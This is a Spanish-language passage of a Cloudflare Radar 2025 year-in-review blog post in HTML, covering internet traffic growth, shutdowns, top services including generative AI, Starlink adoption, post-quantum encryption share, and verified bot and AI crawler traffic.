      <h2>Tendencias del tráfico</h2>
      <a href="#tendencias-del-trafico">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3EqqyX4A0PI27tBdVijUq2/9102522d8661d7d5911ece00c1b1e678/BLOG-3077_2.png" />
          </figure>
    <div>
      <h3>El tráfico global de Internet creció un 19 % en 2025, y el crecimiento más significativo se produjo a partir de agosto</h3>
      <a href="#el-trafico-global-de-internet-crecio-un-19-en-2025-y-el-crecimiento-mas-significativo-se-produjo-a-partir-de-agosto">
        
      </a>
    </div>
    <p>Para determinar las tendencias de tráfico a lo largo del tiempo en este informe, utilizamos como referencia el volumen medio diario de tráfico (sin incluir el tráfico de bots) durante la segunda semana completa del calendario (del 12 al 18 de enero) de 2025. (Se toma como referencia la segunda semana para dar tiempo a que las personas vuelvan a sus rutinas escolares y laborales "habituales" después de las vacaciones de invierno y el día de Año Nuevo). El cambio porcentual que se muestra en el gráfico de tendencias de tráfico se calcula teniendo en cuenta el valor de referencia, no representa el volumen de tráfico absoluto de un país o región. La línea de tendencia representa un promedio de seguimiento de siete días que se utiliza para mitigar los cambios bruscos que se observan con los datos diarios en detalle. </p><p>El crecimiento del tráfico en 2025 pareció producirse en varias fases. El tráfico se mantuvo, de media, relativamente estable hasta mediados de abril, situándose en general en un margen de un par de puntos porcentuales con respecto al valor de referencia. Sin embargo, a partir de entonces experimentó un crecimiento hasta alcanzar aproximadamente un 5 % por encima del valor de referencia en mayo, manteniéndose en un rango del +4-7 % hasta mediados de agosto. Fue entonces cuando el crecimiento se aceleró, aumentando de forma constante durante septiembre, octubre y noviembre, hasta <a href="https://radar.cloudflare.com/year-in-review/2025#internet-traffic-growth"><u>alcanzar un máximo del 19 %</u></a> en el conjunto del año. Gracias al aumento de finales de noviembre, la tasa de crecimiento de 2025 es aproximadamente un 10 % superior al crecimiento del 17 % observado en 2024. En los <a href="https://blog.cloudflare.com/radar-2024-year-in-review/#global-internet-traffic-grew-17-2-in-2024"><u>últimos años</u></a>, también hemos observado una aceleración del crecimiento del tráfico en la segunda mitad del año. No obstante, en 2022-2024, esa aceleración comenzó en julio. No está claro por qué el crecimiento de este año se retrasó aparentemente varias semanas.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3I9BSisZlIKlCrANpDTBtx/deb202dba9ca9aa7e23379bab6d81412/BLOG-3077_3_-_traffic-internet_traffic_growth_-_worldwide.png" />
          </figure><p><i><sup>Tendencias del tráfico de Internet en 2025, a nivel mundial</sup></i></p><p><a href="https://radar.cloudflare.com/year-in-review/2025/bw#internet-traffic-growth"><u>Botsuana</u></a> registró el mayor pico de crecimiento, llegando a superar en un 298 % el nivel de referencia el 8 de noviembre y finalizando el periodo un 295 % por encima del nivel de referencia. (Más información sobre lo que explica ese crecimiento en la sección de Starlink a continuación). Botsuana y <a href="https://radar.cloudflare.com/year-in-review/2025/sd#internet-traffic-growth"><u>Sudán</u></a> fueron los únicos países o regiones que vieron cómo el tráfico se duplicaba con creces a lo largo del año, aunque algunos otros experimentaron aumentos máximos superiores al 100 % en algún momento del año.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1z4fQNQvLZM5li5h7JWeIq/ed3afd5c7d2412a7426f3e7c4985be33/BLOG-3077_4_-_traffic-internet_traffic_growth_-_Botswana.png" />
          </figure><p><i><sup>Tendencias del tráfico de Internet en 2025 | Botsuana</sup></i></p><p>El impacto de las interrupciones prolongadas de Internet también se aprecia claramente en los gráficos. Por ejemplo, el 29 de octubre, el Gobierno <a href="https://radar.cloudflare.com/year-in-review/2025/tz#internet-traffic-growth"><u>tanzano</u></a> impuso un bloqueo de Internet en respuesta a las protestas del día de las elecciones. Ese cierre duró solo un día, pero hubo otro desde el 30 de octubre hasta el 3 de noviembre. Aunque el tráfico en el país había aumentado más de un 40 % por encima del valor de referencia antes de los cierres, la interrupción acabó reduciendo el tráfico más de un 70 % por debajo del nivel de referencia, lo que supuso un rápido cambio de tendencia. El tráfico se recuperó rápidamente tras restablecerse la conectividad. Se observó un patrón similar en <a href="https://radar.cloudflare.com/year-in-review/2025/jm#internet-traffic-growth"><u>Jamaica</u></a>, donde el tráfico de Internet se disparó antes de la llegada del <a href="https://x.com/CloudflareRadar/status/1983188999461319102?s=20"><u>huracán Melissa</u></a> el 28 de octubre, y luego disminuyó significativamente después de que la tormenta causara cortes de energía y daños a la infraestructura en la isla. El tráfico comenzó a recuperarse tras el paso de la tormenta y, a principios de diciembre, volvió a situarse ligeramente por encima del nivel de referencia.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4dVMnD0mQvl4sB1bbn6kka/a7c433aaf2df3319328b27156bf70618/BLOG-3077_5_-_traffic-internet_traffic_growth_-_Tanzania.png" />
          </figure><p><i><sup>Tendencias del tráfico de Internet en 2025 | Tanzania</sup></i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4dovYDK7vTfjsL9FBNAvjE/a80a0c8fe69cce81ecc03605ae874859/BLOG-3077_6_-_traffic-internet_traffic_growth_-_Jamaica.png" />
          </figure><p><i><sup>Tendencias del tráfico de Internet en 2025 | Jamaica</sup></i></p>
    <div>
      <h3>Los 10 servicios de Internet más populares experimentaron algunos cambios interanuales, mientras que las listas de categorías registraron varias nuevas incorporaciones</h3>
      <a href="#los-10-servicios-de-internet-mas-populares-experimentaron-algunos-cambios-interanuales-mientras-que-las-listas-de-categorias-registraron-varias-nuevas-incorporaciones">
        
      </a>
    </div>
    <p>En este informe, analizamos el periodo de 11 meses transcurridos hasta la fecha. Además de una lista clasificada "general", también clasificamos los servicios en nueve categorías, basándonos en el análisis de datos de consultas anonimizadas de tráfico a nuestro <a href="https://1.1.1.1/dns"><u>solucionador de DNS público 1.1.1.1</u></a> de millones de usuarios de todo el mundo. Para estas clasificaciones, se agrupan los dominios que pertenecen a un único servicio de Internet.</p><p>Google y Facebook volvieron a ocupar los dos primeros puestos entre los <a href="https://radar.cloudflare.com/year-in-review/2025/#internet-services"><u>10 primeros</u></a>. Aunque los demás miembros de la lista de los 10 primeros se mantuvieron igual que en la clasificación de 2024, hubo algunos cambios en la parte media. Microsoft, Instagram y YouTube escalaron posiciones, Amazon Web Services (AWS) bajó un puesto, mientras que TikTok cayó cuatro puestos.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4vMi7DU13dkmLCkhEvvzVO/bdc5b0baa3b140c6112abf3b7414da83/BLOG-3077_7_-_traffic-topinternetservices.png" />
          </figure><p><i><sup>Principales servicios de Internet en 2025, a nivel mundial</sup></i></p><p>Entre los servicios de IA generativa, ChatGPT / OpenAI se mantuvo a la cabeza de la lista. Sin embargo, hubo cambios en otros servicios, lo que destaca la naturaleza dinámica de la industria. Entre los servicios que han mejorado su posición en la clasificación se encuentran Perplexity, Claude / Anthropic y GitHub Copilot. Entre las nuevas incorporaciones al ranking de los 10 principales servicios de 2025 se encuentran Google Gemini, Windsurf AI, Grok/xAI y DeepSeek.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/vUiNheIzMym9Mr3TPK3yN/c4684bb93696e31dcd689b1a150d35cd/BLOG-3077_8_-_Generative_AI.png" />
          </figure><p><i><sup>Principales servicios de IA generativa en 2025, a nivel mundial</sup></i></p><p>Otras categorías también experimentaron cambios en sus listas: Shopee ("la plataforma líder de comercio electrónico y compras en línea en el sureste asiático y Taiwán") es una nueva incorporación a la lista de comercio electrónico, y HBO Max se ha unido a la clasificación de streaming de vídeo. Estas clasificaciones en categorías, y las tendencias observadas por servicios específicos, se analizan en más detalle en <a href="https://blog.cloudflare.com/radar-2025-year-in-review-internet-services/"><u>otra publicación del blog</u></a>.</p><p>Además, este año también ofrecemos información detallada sobre los principales servicios de Internet a nivel de país / región para las categorías "General", "IA generativa", "Redes sociales" y "Mensajería". (En 2024, solo compartimos información general).</p>
    <div>
      <h3>El tráfico de Starlink se duplicó en 2025, incluido el tráfico de más de 20 países / regiones nuevos</h3>
      <a href="#el-trafico-de-starlink-se-duplico-en-2025-incluido-el-trafico-de-mas-de-20-paises-regiones-nuevos">
        
      </a>
    </div>
    <p>El servicio de Internet por satélite de SpaceX Starlink sigue siendo una opción popular para llevar conectividad a zonas sin servicio o con servicio deficiente, así como a usuarios en <a href="https://starlink.com/business/aviation"><u>aviones</u></a> y <a href="https://starlink.com/business/maritime"><u>barcos</u></a>. Analizamos los volúmenes de tráfico conjunto de Cloudflare relacionados con el sistema <a href="https://www.cloudflare.com/learning/network-layer/what-is-an-autonomous-system/"><u>autónomo principal</u></a> de Starlink (<a href="https://radar.cloudflare.com/as14593"><u>AS14593</u></a>) para realizar un seguimiento del crecimiento en el uso del servicio a lo largo de 2025. El volumen de solicitudes que se muestra en la línea de tendencia del gráfico representa el promedio de los últimos siete días. </p><p>A nivel mundial, el <a href="https://radar.cloudflare.com/year-in-review/2025/#starlink-traffic-trends"><u>tráfico de Starlink</u></a> siguió experimentando un crecimiento constante a lo largo de 2025, y el volumen total de solicitudes se multiplicó por 2,3 a lo largo del año. Tendemos a observar un rápido crecimiento del tráfico cuando el servicio Starlink está disponible en un país o región, y esta tendencia continúa en 2025. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4d7DF8FT1RuK8rbrFfUu1E/c05645dc7640e11794b35770bc0bcd70/BLOG-3077_9_-_traffic-starlink-worldwide.png" />
          </figure><p><i><sup>Crecimiento del tráfico de Starlink en 2025, a nivel mundial</sup></i></p><p>Eso es exactamente lo que vimos en los más de 20 países / regiones nuevos donde <a href="https://x.com/starlink"><u>@Starlink</u></a> anunció su disponibilidad. En cuestión de días, el tráfico de Starlink en esos lugares aumentó rápidamente. Entre ellos se encontraban <a href="https://radar.cloudflare.com/year-in-review/2025/am#starlink-traffic-trends"><u>Armenia</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/ne#starlink-traffic-trends"><u>Níger</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/lk#starlink-traffic-trends"><u>Sri Lanka</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2025/sx#starlink-traffic-trends"><u>San Martín</u></a>.</p><p>También observamos tráfico de Starlink desde varias ubicaciones que actualmente no están <a href="https://starlink.com/map"><u>marcadas como disponibles para el servicio</u></a>. Sin embargo, hay prefijos IPv4 y/o IPv6 asociados a estos países en la <a href="https://geoip.starlinkisp.net/feed.csv"><u>geofeed publicada</u></a> por Starlink. Dada la posibilidad de que los usuarios de Starlink puedan utilizar su servicio (y su equipo) en <a href="https://starlink.com/roam"><u>itinerancia</u></a>, es probable que este tráfico provenga de usuarios en itinerancia en esas zonas.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4knmSgVn4FFyMm3ZRNRvuq/887455ee737217a7f9bad2cedbbff009/BLOG-3077_10_-_traffic-starlink-niger.png" />
          </figure><p><i><sup>Crecimiento del tráfico de Starlink en 2025 | Níger</sup></i></p><p>De los países / regiones en los que el servicio estaba activo antes de 2025, <a href="https://radar.cloudflare.com/year-in-review/2025/bj#starlink-traffic-trends"><u>Benín</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/tl#starlink-traffic-trends"><u>Timor Oriental</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2025/bw#starlink-traffic-trends"><u>Botsuana</u></a> registraron algunos de los mayores crecimientos de tráfico, con un aumento de 51, 19 y 16 veces, respectivamente. La disponibilidad del servicio Starlink en <a href="https://x.com/Starlink/status/1720438167944499638"><u>Benín</u></a> se anunció por primera vez en noviembre de 2023, en <a href="https://x.com/Starlink/status/1866631930902622360"><u>Timor Oriental</u></a> en diciembre de 2024, y en <a href="https://x.com/Starlink/status/1828840132688130322"><u>Botsuana</u></a> en agosto de 2024.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/PlOuYo67dUghmsSVtzd5k/d8ff2816e5703cc425c403c52bd56be1/BLOG-3077_11_-_traffic-starlink-botswana.png" />
          </figure><p><i><sup>Crecimiento del tráfico de Starlink en 2025 | Botsuana</sup></i></p><p>Servicios similares, como <a href="https://leo.amazon.com/"><u>Amazon Leo</u></a>, <a href="https://www.eutelsat.com/satellite-services/tv-internet-home/satellite-internet-home-business-konnect"><u>Eutelsat Konnect</u></a> y <a href="https://en.wikipedia.org/wiki/Qianfan"><u>Qianfan</u></a> de China, continúan ampliando sus constelaciones de satélites y avanzando hacia su disponibilidad comercial. Esperamos revisar el crecimiento del tráfico en estos servicios también en el futuro.</p>
    <div>
      <h3>Googlebot volvió a ser responsable del mayor volumen de tráfico de solicitudes a Cloudflare en 2025, ya que rastreó millones de sitios de clientes de Cloudflare para la indexación de búsquedas y el entrenamiento de IA</h3>
      <a href="#googlebot-volvio-a-ser-responsable-del-mayor-volumen-de-trafico-de-solicitudes-a-cloudflare-en-2025-ya-que-rastreo-millones-de-sitios-de-clientes-de-cloudflare-para-la-indexacion-de-busquedas-y-el-entrenamiento-de-ia">
        
      </a>
    </div>
    <p>Para observar el tráfico total de solicitudes que Cloudflare registró en 2025 desde toda la red de Internet IPv4, podemos utilizar una <a href="https://en.wikipedia.org/wiki/Hilbert_curve"><u>curva de Hilbert</u></a>, que nos permite visualizar una secuencia de direcciones IPv4 en un patrón bidimensional que mantiene las direcciones IP cercanas entre sí, lo que resulta <a href="https://xkcd.com/195/"><u>útil</u></a> para estudiar el espacio de direcciones IPv4 de Internet. En la <a href="https://radar.cloudflare.com/year-in-review/2025/#ipv4-traffic-distribution"><u>visualización</u></a>, agregamos las direcciones IPv4 en prefijos <a href="https://www.ripe.net/about-us/press-centre/IPv4CIDRChart_2015.pdf"><u>/20</u></a>, lo que significa que en el nivel de ampliación más alto, cada cuadrado representa el tráfico de 4096 direcciones IPv4. Este nivel de agregación mantiene la cantidad de datos utilizados para la visualización en un nivel manejable. Consulta la publicación del blog "<a href="https://blog.cloudflare.com/radar-2024-year-in-review/#googlebot-was-responsible-for-the-highest-volume-of-request-traffic-to-cloudflare-in-2024-as-it-retrieved-content-from-millions-of-cloudflare-customer-sites-for-search-indexing"><u>Resumen del año 2024</u></a>" para obtener más información sobre la visualización.</p><p>Por tercer año consecutivo, el bloque de direcciones IP que tuvo el máximo volumen de solicitudes a Cloudflare durante 2025 fue el <a href="https://radar.cloudflare.com/routing/prefix/66.249.64.0/20"><u>66.249.64.0/20</u></a> de Google, <a href="https://developers.google.com/static/search/apis/ipranges/googlebot.json"><u>uno de varios</u></a> utilizados por el rastreador web <a href="https://developers.google.com/search/docs/crawling-indexing/googlebot"><u>Googlebot</u></a> para recuperar contenido para la indexación de búsqueda y el entrenamiento de la IA. No es de extrañar que un bloque de direcciones IP de Googlebot se haya clasificado de nuevo como la principal fuente de tráfico de solicitudes, dado el número de propiedades web en la red de Cloudflare y la <a href="#googlebot-was-responsible-for-more-than-a-quarter-of-verified-bot-traffic"><u>agresiva actividad de rastreo de Googlebot</u></a>. El prefijo Googlebot representó casi cuatro veces más tráfico de solicitudes IPv4 que la siguiente fuente de tráfico más importante, 146.20.240.0/20, que forma parte de un <a href="https://radar.cloudflare.com/routing/prefix/146.20.0.0/16"><u>bloque más grande de espacio de direcciones IPv4 anunciado por Rackspace Hosting</u></a>. Como proveedor de nube y alojamiento, Rackspace admite muchos tipos diferentes de clientes y aplicaciones, por lo que se desconoce el origen del tráfico observado hacia Cloudflare.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5NpjYc7D7ykOlLh837jarL/59c2bd9927a2fb16bb39973f4d8d1db8/BLOG-3077_12_-_traffic-ipv4distribution-googlebot.png" />
          </figure><p><i><sup>Vista ampliada de la curva de Hilbert que muestra el bloque de direcciones que generó el mayor volumen de solicitudes en 2025</sup></i></p><p>Este año, hemos añadido la capacidad de buscar un sistema autónomo (ASN) a la visualización, lo que le permite ver con qué amplitud se distribuyen las existencias de direcciones IP de un proveedor de red en el universo IPv4. </p><p>Un ejemplo es AS16509 (AMAZON-02, utilizado con AWS), que muestra los resultados de las adquisiciones de <a href="https://toonk.io/aws-and-their-billions-in-ipv4-addresses/index.html"><u>grandes cantidades de espacio de direcciones IPv4</u></a> por parte de Amazon a lo largo de los años. Otro ejemplo es AS7018 (ATT-INTERNET4, AT&amp;T), que es uno de los mayores <a href="https://radar.cloudflare.com/routing/us#ases-registered-in-united-states"><u>anunciadores de espacio de direcciones IPv4 en Estados Unidos</u></a>. Gran parte del tráfico que vemos de este ASN procede de <a href="https://radar.cloudflare.com/routing/prefix/12.0.0.0/8"><u>12.0.0.0/8,</u></a> un bloque de más de 16 millones de direcciones IPv4 que es <a href="https://wq.apnic.net/apnic-bin/whois.pl?searchtext=12.147.5.178"><u>propiedad de AT&amp;T desde 1983</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/42mehcaIRV4Kp9h6P86z6d/436e033e353710419fcc49865d765258/BLOG-3077_13_-_traffic-ipv4distribution-as7018.png" />
          </figure><p><i><sup>Curva de Hilbert que muestra los bloques de direcciones IPv4 del AS7018 que enviaron tráfico a Cloudflare en 2025</sup></i></p>
    <div>
      <h3>La proporción del tráfico web generado por usuarios que está cifrado con tecnología poscuántica ha aumentado hasta el 52 %</h3>
      <a href="#la-proporcion-del-trafico-web-generado-por-usuarios-que-esta-cifrado-con-tecnologia-poscuantica-ha-aumentado-hasta-el-52">
        
      </a>
    </div>
    <p>El término "<a href="https://en.wikipedia.org/wiki/Post-quantum_cryptography"><u>poscuántico</u></a>" hace referencia a un conjunto de técnicas criptográficas diseñadas para proteger los datos cifrados de los ataques "<a href="https://en.wikipedia.org/wiki/Harvest_now,_decrypt_later"><u>harvest now, decrypt later</u></a>" (recopilar ahora, desencriptar más tarde) por parte de ciberdelincuentes que tienen la capacidad de capturar y almacenar datos actuales para su posterior descifrado mediante ordenadores cuánticos suficientemente avanzados. El equipo de investigación de Cloudflare lleva <a href="https://blog.cloudflare.com/sidh-go/"><u>trabajando en criptografía poscuántica desde 2017</u></a> y publica periódicamente <a href="https://blog.cloudflare.com/pq-2025/"><u>actualizaciones</u></a> sobre el estado de la red de Internet poscuántica.</p><p>Tras experimentar un <a href="https://radar.cloudflare.com/year-in-review/2024#post-quantum-encryption"><u>crecimiento significativo en 2024</u></a>, la proporción global de <a href="https://radar.cloudflare.com/year-in-review/2025/#post-quantum-encryption"><u>tráfico encriptado poscuántico</u></a> casi se duplicó a lo largo de 2025, pasando del 29 % a principios de año al 52 % a principios de diciembre. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/qqehh1EqKIMi7xNcSr8SN/c24962ce446e153fbd37c9abe7254f78/BLOG-3077_14_-_traffic-postquantum-worldwide.png" />
          </figure><p><i><sup>Crecimiento del tráfico TLS 1.3 encriptado poscuántico en 2025, a nivel mundial</sup></i></p><p>Veintiocho países / regiones vieron cómo su porcentaje de tráfico encriptado poscuántico se duplicaba con creces a lo largo del año, incluido un crecimiento significativo en <a href="https://radar.cloudflare.com/year-in-review/2025/pr#post-quantum-encryption"><u>Puerto Rico</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2025/kw#post-quantum-encryption"><u>Kuwait</u></a>. La proporción de Kuwait casi se triplicó, pasando del 13 % al 37 %, y la de Puerto Rico creció del 20 % al 49 %. </p><p>Esos tres fueron algunos de los que experimentaron un crecimiento significativo de su cuota a mediados de septiembre, <a href="https://9to5mac.com/2025/09/09/apple-announces-ios-26-release-date-september-15/"><u>coincidiendo con</u></a> el lanzamiento por parte de Apple de actualizaciones del sistema operativo, en las que las "<i>conexiones protegidas por TLS</i><a href="https://support.apple.com/en-us/122756"><i><u> anunciarán automáticamente la compatibilidad con el intercambio híbrido de claves cuánticas seguras</u></i></a><i> en TLS 1.3</i>". En Kuwait y Puerto Rico, más de la mitad del tráfico de solicitudes proviene de dispositivos móviles, y aproximadamente la mitad proviene de dispositivos iOS en ambos lugares. Por lo tanto, no es sorprendente que esta actualización de software resultara en un aumento significativo del tráfico poscuántico.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Y65KuTezdGnAfilj9Xosr/a74b60f9f24322827ea89f9ad1eef035/BLOG-3077_15_-_traffic-postquantum-puertorico.png" />
          </figure><p><i><sup>Crecimiento del tráfico TLS 1.3 encriptado postcuántico en 2025 | Puerto Rico</sup></i></p><p>Con ese fin, la proporción de tráfico cifrado postcuántico de los dispositivos Apple iOS <a href="https://radar.cloudflare.com/explorer?dataSet=http&amp;groupBy=post_quantum&amp;filters=botClass%253DLIKELY_HUMAN%252Cos%253DiOS&amp;dt=2025-09-01_2025-09-28"><u>aumentó significativamente en septiembre</u></a> tras el lanzamiento oficial de iOS 26. Solo <a href="https://x.com/CloudflareRadar/status/1969159602999640535?s=20"><u>cuatro días después del lanzamiento</u></a>, la cuota global de solicitudes con soporte poscuántico de dispositivos iOS aumentó de poco menos del 2 % al 11 %. A <a href="https://radar.cloudflare.com/explorer?dataSet=http&amp;groupBy=post_quantum&amp;filters=deviceType%253DMobile%252Cos%253DiOS%252CbotClass%253DLikely_Human&amp;dt=2025-12-01_2025-12-07"><u>principios de diciembre</u></a>, más del 25 % de las solicitudes de dispositivos iOS utilizaban encriptación poscuántica.</p>
    <div>
      <h3>Googlebot fue responsable de más de una cuarta parte del tráfico de bots verificados</h3>
      <a href="#googlebot-fue-responsable-de-mas-de-una-cuarta-parte-del-trafico-de-bots-verificados">
        
      </a>
    </div>
    <p>El nuevo <a href="https://radar.cloudflare.com/bots/directory?kind=all"><u>directorio de bots</u></a> en Cloudflare Radar proporciona una gran cantidad de información sobre <a href="https://developers.cloudflare.com/bots/concepts/bot/verified-bots/"><u>bots verificados</u></a> y <a href="https://developers.cloudflare.com/bots/concepts/bot/signed-agents/"><u>agentes firmados</u></a>, incluidos sus operadores, categorías y agentes de usuario asociados, enlaces a documentación y tendencias de tráfico. Los bots verificados deben cumplir una <a href="https://developers.cloudflare.com/bots/concepts/bot/verified-bots/policy/"><u>serie de requisitos</u></a>, además de ser verificados mediante <a href="https://developers.cloudflare.com/bots/reference/bot-verification/web-bot-auth/"><u>Web Bot Auth</u></a> o la <a href="https://developers.cloudflare.com/bots/reference/bot-verification/ip-validation/"><u>validación de dirección IP</u></a>. Un agente firmado está controlado por un usuario final y un agente de firma verificado desde su implementación de <a href="https://developers.cloudflare.com/bots/reference/bot-verification/web-bot-auth/"><u>Web Bot Auth</u></a>, y debe cumplir con un <a href="https://developers.cloudflare.com/bots/concepts/bot/signed-agents/policy/"><u>conjunto independiente de requisitos</u></a>.</p><p><a href="https://radar.cloudflare.com/bots/directory/google"><u>Googlebot</u></a> se utiliza para rastrear el contenido del sitio web para la indexación de búsqueda y el entrenamiento de la IA, y fue, de lejos, el <a href="https://radar.cloudflare.com/year-in-review/2025/#per-bot-traffic"><u>bot más activo observado por Cloudflare</u></a> durante todo 2025. Estuvo más activo entre mediados de febrero y mediados de julio, alcanzando su punto máximo a mediados de abril, y fue responsable de más del 28 % del tráfico de bots verificados. Otros bots operados por Google que fueron responsables de cantidades notables de tráfico incluían <a href="https://radar.cloudflare.com/bots/directory/googleads"><u>Google AdsBot</u></a> (utilizado para supervisar los sitios web donde se muestran anuncios de Google), <a href="https://radar.cloudflare.com/bots/directory/googleimageproxy"><u>Google Image Proxy</u></a> (utilizado para recuperar y almacenar en caché images incrustadas en mensajes de correo electrónico) y <a href="https://radar.cloudflare.com/bots/directory/google-other"><u>GoogleOther</u></a> (utilizado por varios equipos de producto para obtener contenido accesible públicamente de los sitios).</p><p>El <a href="https://radar.cloudflare.com/bots/directory/gptbot"><u>GPTBot</u></a> de OpenAI, que rastrea contenido para el entrenamiento de la IA, fue el siguiente bot más activo, de hecho originó aproximadamente el 7,5 % del tráfico de bots verificados, con una actividad de rastreo bastante volátil durante la primera mitad del año. <a href="https://radar.cloudflare.com/bots/directory/bing"><u>Bingbot</u></a> de Microsoft rastrea el contenido de sitios web para indexación de búsquedas y entrenamiento de la IA, y generó el 6 % del tráfico de bots verificados a lo largo del año, lo que muestra una actividad relativamente estable. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/01CNwrALbfJ1DBJpX3hHvw/58f278f76b4e57d095e5e61b879f3728/BLOG-3077_16_-_traffic-verifiedbot-bots.png" />
          </figure><p><i><sup>Tendencias del tráfico de bots verificados en 2025, a nivel mundial</sup></i></p><p>Los rastreadores de motores de búsqueda y los rastreadores de IA son las dos categorías de bots verificados más activas, con patrones de tráfico que se corresponden estrechamente con los principales bots de esas categorías, incluidos GoogleBot y GPTBot de OpenAI. <a href="https://radar.cloudflare.com/bots/directory?category=SEARCH_ENGINE_CRAWLER&amp;kind=all"><u>Los rastreadores de motores de búsqueda</u></a> fueron responsables del 40 % del tráfico de bots verificados, y los <a href="https://radar.cloudflare.com/bots/directory?category=AI_CRAWLER&amp;kind=all"><u>rastreadores de IA</u></a> generaron la mitad (20 %). Los bots de <a href="https://radar.cloudflare.com/bots/directory?category=SEARCH_ENGINE_OPTIMIZATION&amp;kind=all"><u>optimización de motores de búsqueda</u></a> también fueron bastante activos y generaron más del 13 % de las solicitudes de bots verificados.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6IFOI7astEqMk1fqLPvhMK/860c1b28fe6d2987b7bcd8510d1495b5/BLOG-3077_17_-_traffic-verifiedbots-category.png" />
          </figure><p><i><sup>Tendencias del tráfico de bots verificados por categoría en 2025, a nivel mundial</sup></i></p>
    <div>
      <h2>Información sobre la IA</h2>
      <a href="#informacion-sobre-la-ia">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7IY2MCHqrWK7wPO5XSrHwc/2d4622db6417472e2702c31a95d31cef/BLOG-3077_18_-_.png" />
          </figure>
    <div>
      <h2> El volumen de rastreo del Googlebot de doble propósito eclipsó al de otros bots y rastreadores de IA</h2>
      <a href="#el-volumen-de-rastreo-del-googlebot-de-doble-proposito-eclipso-al-de-otros-bots-y-rastreadores-de-ia">
        
      </a>
    </div>
    <p>En septiembre, una <a href="https://blog.cloudflare.com/building-a-better-internet-with-responsible-ai-bot-principles/"><u>entrada del blog</u></a> de Cloudflare presentó una propuesta de principios para el uso responsable de los bots con IA, uno de los cuales era "los bots con IA deben tener un propósito claro y declararlo". En la <a href="https://radar.cloudflare.com/ai-insights#ai-bot-best-practices"><u>descripción general de las prácticas recomendadas para bots de IA</u></a> en Radar, observamos que varios operadores de bots tienen rastreadores de doble propósito, incluidos Google y Microsoft.</p><p>Dado que <a href="https://radar.cloudflare.com/bots/directory/google"><u>Googlebot</u></a> rastrea tanto para la indexación del motor de búsqueda como para el entrenamiento de la IA, lo hemos incluido en la <a href="https://radar.cloudflare.com/year-in-review/2025/#ai-bot-and-crawler-traffic"><u>descripción general de los rastreadores de IA</u></a> de este año. En 2025, su volumen de rastreo superó al de otros bots de IA líderes. El tráfico de solicitudes comenzó a aumentar a mediados de febrero, alcanzando su punto máximo a finales de abril, y luego disminuyó lentamente hasta finales de julio. Después de eso, creció gradualmente hasta el final del año. <a href="https://radar.cloudflare.com/bots/directory/bing"><u>Bingbot</u></a> también tiene un doble propósito similar, aunque su volumen de rastreo es una pequeña parte del de Googlebot. La actividad de rastreo de Bingbot tuvo una tendencia generalmente al alza a lo largo del año.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/14AYO1s8q9J0zN9gcTaz0h/d60ad6cdd7af04938d98eda081bea834/BLOG-3077_19_-_ai-botandcrawlertraffic.png" />
          </figure><p><i><sup>Tendencias del tráfico de rastreadores de IA en 2025, a nivel mundial</sup></i></p><p>El <a href="https://radar.cloudflare.com/bots/directory/gptbot"><u>GPTBot</u></a> de OpenAI se utiliza para rastrear contenido que puede usarse en el entrenamiento de modelos básicos de IA generativa de OpenAI. Su actividad de rastreo fue bastante volátil durante el año, alcanzando sus niveles máximos en junio, pero terminó en noviembre ligeramente por encima de los niveles de rastreo observados a principios de año. </p><p>El volumen de rastreo de <a href="https://radar.cloudflare.com/bots/directory/chatgpt-user"><u>ChatGPT-User</u></a> de OpenAI, que visita páginas web cuando los usuarios hacen preguntas a ChatGPT o CustomGPT, experimentó un crecimiento sostenido a lo largo del año. Un patrón de uso semanal se hizo más evidente a partir de mediados de febrero, lo que sugiere un aumento del uso en los centros educativos y en el lugar de trabajo. Los volúmenes máximos de solicitudes fueron hasta 16 veces superiores a los de principios de año. También se hizo evidente un descenso en la actividad durante el periodo de junio a agosto, ya que muchos estudiantes estaban de vacaciones y numerosos profesionales se tomaron un descanso. </p><p><a href="https://radar.cloudflare.com/bots/directory/oai-searchbot"><u>OAI-SearchBot</u></a>, que se utiliza para enlazar y mostrar sitios web en los resultados de búsqueda de las funciones de búsqueda de ChatGPT, experimentó un crecimiento gradual de la actividad de rastreo a lo largo del mes de agosto, seguido de varios picos de tráfico en agosto y septiembre, antes de comenzar a crecer de forma más acusada a principios de octubre, con un volumen máximo de solicitudes durante un pico a finales de octubre aproximadamente cinco veces superior al de principios de año.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Y39lUtvOLcaxwSwop4Egs/b9790ef1314a35ff811e4ed09d875271/BLOG-3077_20_-_image59.png" />
